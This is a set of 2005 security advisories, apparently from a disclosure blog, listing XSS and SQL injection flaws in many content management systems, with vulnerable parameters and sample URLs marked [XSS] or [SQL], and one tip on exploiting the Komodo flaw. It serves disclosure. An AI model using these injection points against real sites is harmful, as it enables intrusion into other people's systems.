    Liferay Portal Enterprise contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "_77_struts_action" "p_p_mode" "p_p_state" and search module paremters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:

    /web/guest/downloads/portal_ent?p_p_id=77
    &p_p_action=1&p_p_state=maximized&p_p_mod
    e=view&p_p_col_order=null&p_p_col_pos=2&p
    _p_col_count=3&_77_struts_action=[XSS]


    /web/guest/downloads/portal_ent?p_p_id=77
    &p_p_action=1&p_p_state=maximized&p_p_mod
    e=[XSS]


    /web/guest/downloads/portal_ent?p_p_id=77
    &p_p_action=1&p_p_state=[XSS]


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Libertas Enterprise CMS XSS vuln.

    Libertas Enterprise CMS XSS vuln.

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://www.libertas-solutions.com/
    affected version:3.0 and prior

    Product Description:

    Libertas Enterprise Content Management Server is used by larger organisations and government departments. Standards compliance is core to this CMS product with Dublin Core, eGifs, eForms, UK Government Access Keys and support for numerous XML standards. The system's n-tier architecture is highly scalable ensuring maximum availability. The interface is exceptionally easy to use, requiring limited training for staff already familiar with popular word processing applications. Like all Libertas Solutions suite of CMS products, creating accessible websites is fundamental with tools to ensure WAI / section 508 compliant sites.


    Vuln. Description:

    Libertas Enterprise CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "page_search" paramter isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

    /search/index.php?advanced=0&associa
    ted_list=&page=1&search=0&page_search=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    damoon® XSS vuln

    damoon® XSS vuln

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://www.mindroute.us/?id=2452
    affected version: latest


    Vuln. Description:

    damoon® contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    lemoon® XSS vuln

    lemoon® XSS vuln

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://www.mindroute.us/?id=426
    affected version: 2.0 and prior


    Product Description:

    lemoon® is a fully packaged CM software solution that combines simplicity with versatility. It requires no third party licenses and thus offers a very competitive price. A free demo is available. Customers using lemoon� includes Sony Ericsson, Precise Biometrics, Q-MATIC, AudioDev, Pharmadule Emtunga and more.

    Vuln. Description:

    lemoon® contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Komodo CMS vuln.

    Komodo CMS vuln.

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://www.komodocms.com/
    affected version:v2.1 and prior + other editions can have same vuln.


    Product Description:

    Intuitive, simple-to-use and powerful web content management system. Cross browser and cross platform, Komodo CMS has been developed to give control back to organizations, empowering them to maintain and manage their web infrastructure. Komodo CMS is particularly suitable for organizations who see their website as a marketing and business generation channel. Why compromise on design or ease of use when you can have both? Komodo CMS purchase price includes design integration and training.


    Vuln. Description:

    1. SQL inj.

    Komodo CMS contains a flaw that allows a remote sql injection attacks.Input passed to the "page" parameter in "page.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

    example:

    /page.php?page=[SQL]

    Note: For testing or exploiting this vuln., switch off javascript support in your browser, cauz for an error Komodo will answer with redirect:)


    2. XSS

    Komodo CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    ODFaq SQL inj. vuln.

    ODFaq SQL inj. vuln.

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://www.oodie.com/project/odfaq/
    affected version: 2.1.0 and prior

    Product Description:

    PHP application that allows you to manage frequently asked questions. You can create/edit/delete entries using user-friendly web based interface.

    Vuln. Description:

    ODFaq contains a flaw that allows a remote sql injection attacks.Input passed to the "cat" "srcText" parameter in "faq.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

    examples:

    /faq.php?cat=1[SQL]

    /faq.php?p=search&srcText=r0t[SQL]&submit
    =Go&cat_id=&srcWhat=&dosearch=1

    Solution:
    Edit the source code to ensure that input is properly sanitised.
    ----------------------------------------------------------------
    PS. greeting´s to OSVDB Bloger's:)

    Saturday, December 17, 2005

    Hot Banana XSS vuln.

    Hot Banana XSS vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:www.hotbanana.com/products/web-content-management-suite/
    affected version: 5.3 and prior

    Description:

    Founded in 1999, Hot Banana powers Web sites for more than 180 companies worldwide. Designed for non-technical users, Hot Banana is a full-fledged Web Content Management Suite that manages the content creation and delivery process of a Web site. The Hot Banana Active Marketing Web Content Management Suite consists of the end-to-end integration of Web Content Management, Internet marketing, search engine optimization - SEO, and WebTrends 7.5 Web analytics. Hot Banana is an ideal Web site solution for online branding, corporate communications, lead generation & conversion campaigns, customer retention, PR, and event marketing programs. Hot Banana is available as Hot Banana On-Demand (Software-as-a-Service (SaaS)), or as Hot Banana Licensed. Clients include; Algoma Steel, Bell Industries, Parents Action for Children, Ansell Healthcare Europe, World Vision, Beaver Vending, Los Alamos School Board (New Mexico), Law Society of Upper Canada, Expertech, and The County of Simcoe. Hot Banana Software Inc. is profitable and privately held. www.hotbanana.com


    Vuln. Description:

    Hot Banana contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "keywords" paremter in "index.cfm" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

    /search/index.cfm?keywords=[XSS]&x=25&y=9

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Honeycomb Archive & Honeycomb Archive Enterprise vuln.

    Honeycomb Archive & Honeycomb Archive Enterprise vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://www.quicksquare.com/
    affected version:Honeycomb Archive 3.0 and Honeycomb Archive Enterprise


    Product Description:

    Honeycomb Archive™ is an image library service that functions as a stand-alone web site solution providing a central repository for graphics & files needed to support marketing, advertising, and sales personnel with print and web publishing needs. Industry leaders such as Master Lock® & Valvoline® rely on Honeycomb Archive™ every day to distribute the correct brand images to thousands of users from all over the world.


    Vuln. Description:

    1. Multiple SQL inj. vuln. in Honeycomb Archive and Honeycomb Archive Enterprise

    Honeycomb Archive and Honeycomb Archive Enterprise contains a flaw that allows a remote sql injection attacks.Input passed to the "series" "cat_parent" "cat" "div" in "CategoryResults.cfm" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

    examples:

    /CategoryResults.cfm?div=7&cat=118&cat_parent=107&series=[SQL]
    /CategoryResults.cfm?div=7&cat=118&cat_parent=[SQL]
    /CategoryResults.cfm?div=7&cat=[SQL]
    /CategoryResults.cfm?div=[SQL]

    2. XSS in Honeycomb Archive Enterprise search module

    Honeycomb Archive Enterprise contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    FLIP XSS vuln.

    FLIP XSS vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://www.flipdev.org/
    affected version: 0.9.0.1029 and prior

    Product Description:

    The Free Lanparty Inter-/Intranet Portal contains CMS, Groupware and LAN-Party specific features.

    Vuln. Description:

    FLIP contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "name" paremter in "text.php" and "frame" paremter in "forum.php" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:

    /text.php?name=[XSS]
    /forum.php?frame=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    FarCry XSS vuln.

    FarCry XSS vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://farcry.daemon.com.au/
    affected version:3.0 and prior


    Product Description:

    FarCry is an open source Content Management System (CMS), originally developed by Daemon. It's fully functional, and runs in a host of Enterprise environments today. It requires the Macromedia ColdFusion MX platform and a viable enterprise database (currently FarCry supports MSSQL, Oracle, PostgreSQL and MySQL). The solution runs on Windows 2k+ a vareity of *nix platforms (including Solaris and OSX).


    Vuln. Description:

    FarCry contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search paremters in search module isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Esselbach Storyteller CMS XSS vuln.

    Esselbach Storyteller CMS XSS vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://www.esselbach.com/
    affected version: 1.8 and prior

    Product Description:

    Esselbach Storyteller CMS is a powerful Content Management System designed for high traffic websites

    Vuln. Description:

    Esselbach Storyteller CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search paremters in search module isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    EPiX™ Search query XSS vuln.

    EPiX™ Search query XSS vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://www.go-epix.net/
    affected version:3.1.2 and prior


    Product Description:

    EPIX is a low cost portal solution with CMS capabilities as well as support for JSR168 portlets. It is J2EE (Java) based and runs on any platform.

    Vuln. Description:

    EPIX contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search query paremter in search module isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    e-publish CMS vuln.

    e-publish CMS vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://www.e-publish.gr/
    affected version:v2.0 and prior

    Product Description:

    The e-publish web application is a content management system that is perfect for publishing newspapers, magazines or any other content, over the Internet. It is very convenient to manage the contents of the site with an easy and quick way throught the administration module. No special knowledge is required. e-publish integrates with a banner campaign utility. Throught this service the site owner can administer any advertizing banner campaign in the site. Available also in multilingual edition.

    Vuln. Description:

    1. SQl inj.

    e-publish contains a flaw that allows a remote sql injection attacks.Input passed to the "id" parameter in "printer_friendly.cfm" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

    2. XSS

    e-publish contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "obcatid" and "comid" paremter isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:

    /printer_friendly.cfm?id=[SQL]

    /show.cfm?id=274&obcatid=10[XSS]

    /show.cfm?id=279&how=5&obcatid=9&shfrm=
    1&comid=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Direct News SQL inj.

    Direct News SQL inj.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor: http://www.direct-news.net
    affected version: 4.9 and prior


    Product Description:

    Direct News 4.9 is an easy-to-use CMS based on php-mysql. Its real goal is the simplicity and usability, in order to be used by all.In addition to the Wysiwyg editor, navigation-management, image library and image tools, Direct News 4.9 comes with a new Macromedia Flash compatibility.
    Direct News is one of the few CMS to offers you the ability to manage directly your flash animations contents through the very easy interface of Direct News.
    Direct News improve your Search Engine Optimization, by rewriting the links and allowing you to describe your content as you want.
    Of course, Direct News can manage a shopping cart, and multiple languages websites (with chinese, russian..and others) and administration interfaces. Direct News is also available in a smaller-limited version.


    Vuln. Description:

    Direct News contains a flaw that allows a remote sql injection attacks.Input passed to the "setLang" and search module paremters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

    example:
    /?setLang=[SQL]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    ContentServ 3.1 SQL inj.

    ContentServ 3.1 SQL inj.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://www.contentserv.com/
    affected version: 3.1 and prior

    Product Description:

    The ContentServ envelops more than simple Content Management. It stands for Enterprise Marketing Management Solutions and a holistic approach, aimed at providing full-scale support of all marketing activities. Thus, it also includes Cross Media Publishing, Customer Relationship Management, Catalog and Product Information Management, and also Media Asset Management, to name a few. The EMMS Suite provides a highly professional solution for the creation and maintenance of content, regardless of whether it is to be published in web, print, or other forms of media. Particularly attractive are the numerous possibilities to steer and control all processes concerning content. Among these are a detailed Workflow Management, intelligent definition of user rights, Version Management, and many more. Additionally, the system is structured in a very open manner, allowing easy and seamless blending into existing system environments, and trouble free connection with other components such as SAP or various databases. The most outstanding feature, however, lies in Cross Media Publishing. It enables the publication of content into any medium desired. This is possible by the support over 27 exchange formats. These interfaces make ContentServ the most innovative provider of solutions for the creation, maintenance and publication of content.

    Vuln. Description:

    ContentServ contains a flaw that allows a remote sql injection attacks.Input passed to the "StoryID" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

    example:

    /index.php?StoryID=[SQL]


    Solution:
    Edit the source code to ensure that input is properly sanitised.

     
    Copyright (c) 2006 Pridels Sec Crew